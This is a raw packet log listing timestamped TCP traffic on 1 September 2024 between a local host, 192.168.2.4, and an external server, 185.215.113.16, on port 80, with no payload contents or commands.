Sep 1, 2024 20:09:36.865895987 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.865895987 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.865993977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.866005898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.866014957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.866161108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.866161108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:36.910955906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.911011934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.911022902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:36.911077023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.035727978 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.035763979 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.035811901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.035969973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.087090015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087100983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087114096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087234020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087244987 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087255001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.087275028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.087275982 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.087296009 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.087306976 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.121036053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.121048927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.121062040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.121231079 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.173053026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.173063040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.173125029 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.251327038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.251338005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.251348972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.251389027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.251411915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.251550913 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.251559019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.312338114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.312397003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.312417030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.312427044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.312464952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.312504053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.312555075 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.341635942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341694117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341703892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341721058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.341871023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.341871023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.341876030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341887951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341897011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.341926098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.341950893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.490833044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.490919113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.490919113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.490930080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.490941048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.490957022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.490976095 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.490986109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.554119110 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.554131031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.554141045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.554173946 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.554195881 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.886485100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.886502028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.886518002 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.886554003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.886571884 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.960628033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.960671902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.960685015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:37.960731030 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:37.960760117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.095870018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.095891953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.095904112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.095921040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.095941067 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.096059084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096070051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096080065 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096095085 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.096115112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.096393108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096414089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096424103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.096477985 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.154908895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.154970884 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.154978037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.154989958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.155023098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.155175924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.155186892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.155220032 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.155252934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.314232111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.314244986 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.314255953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.314312935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.314352989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.314390898 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.314435005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.359797955 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.359808922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.359818935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.359882116 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.360424042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.360485077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.360670090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.360680103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.360723972 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.360786915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.360835075 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.361135960 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.361145973 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.361181974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.361222982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.361232996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.361267090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.523067951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.523097992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.523124933 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.523150921 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.555560112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.555588007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.555599928 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.555650949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.555697918 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.555841923 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.555854082 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.555898905 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.556350946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.556363106 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.556399107 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.556555033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.556605101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.557118893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.557137966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.557148933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.557169914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.557188988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.764600992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.764611959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.764625072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.764672995 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.764707088 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.776077032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.776088953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.776099920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.776127100 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.776143074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.778573990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.778629065 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.778681040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.778691053 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.778737068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.779498100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.779510021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.779520035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.779546976 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.779567003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.825896025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.825908899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.825920105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:38.825970888 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:38.825995922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.005844116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.005856991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.005866051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.005927086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.024374962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.024430037 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.024440050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.024440050 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.024467945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.024478912 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.024518967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.024569035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.025582075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.025625944 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.025650024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.025660038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.025698900 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.027278900 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.027311087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.027319908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.027352095 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.027362108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.455905914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.455961943 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.456036091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.456087112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.472763062 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472773075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472781897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472786903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472796917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472811937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.472845078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.472928047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472938061 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472945929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472956896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472968102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472978115 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.472980022 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.472990036 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.472994089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.473006010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.473012924 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.473033905 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.473058939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.473659992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.473670959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.473678112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.473714113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.473730087 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.474940062 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.474950075 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.474957943 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.475033998 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.675714016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.675776958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.675815105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.675865889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.684094906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684106112 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684117079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684159040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.684390068 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684456110 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.684582949 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684633017 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.684700966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684715033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684726000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.684751034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.684773922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.893610001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893634081 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893645048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893675089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.893697977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.893935919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893948078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893956900 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893968105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.893987894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.894015074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.894200087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894246101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.894344091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894354105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894391060 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.894912004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894922018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894932032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.894962072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.894998074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:39.895354033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.895365953 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:39.895401001 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.080811024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.080835104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.080852032 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081020117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081020117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081057072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081101894 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081111908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081129074 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081155062 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081168890 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081463099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081478119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081516981 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081531048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081728935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081774950 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081809044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081824064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081856012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081868887 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.081973076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.081988096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.082010031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.082021952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.082031965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.082055092 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.495245934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495302916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495351076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495464087 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.495464087 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.495474100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495491028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495506048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.495548964 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.495604038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.716515064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.716665030 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:40.716922045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:40.716969967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.370975018 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.371129036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.371134043 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.371176958 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.592010021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.592106104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.592405081 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.592456102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.675276995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.675358057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.675438881 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.675488949 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.845752954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.845899105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.845915079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.845925093 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.845942974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.845973969 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.846014977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.846035004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:41.846061945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:41.846081972 CEST	49738	80	192.168.2.4	185.215.113.16
